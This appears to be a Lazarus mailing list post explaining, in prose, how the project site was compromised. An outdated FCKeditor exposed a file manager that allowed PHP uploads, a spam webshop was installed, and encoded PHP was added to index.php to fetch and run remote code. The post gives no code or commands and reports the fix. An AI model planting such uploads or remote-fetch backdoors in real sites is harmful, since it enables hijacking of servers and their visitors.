Matt Shaffer wrote:
Right, but what I meant was if someone manages to upload their own PHP
file to the lazarus server, they can easily have uploaded a PHP file
manager which has the capability of deleting files, etc, without ever
needing ssh/ftp (this assumes the attack was done through a vulnerable
piece of software, that had write permissions, etc.)
I don't think this scenario is extremely likely.
This is probably what happened.
As I see now, together with tinyportal comes an outdated FCKeditor. This
editor has known issues. The file manager in this editor has access to
some tp subdir where we found a php "filemanager" through which you
could upload files to the whole site.
This way some "buy-your-software-here" webshop got installed and then
managed added a piece of encoded php to index.php.
What this encoded piece did was access a remote server, which in its
turn returned a piece of php which got executed. This piece of php
accesses our or similar webshops to generate traffic.
This last part made browsing the site slow.
At this moment the FCKeditor is disabled and removed.
Marc
--
_______________________________________________
Lazarus mailing list
[email protected]
http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
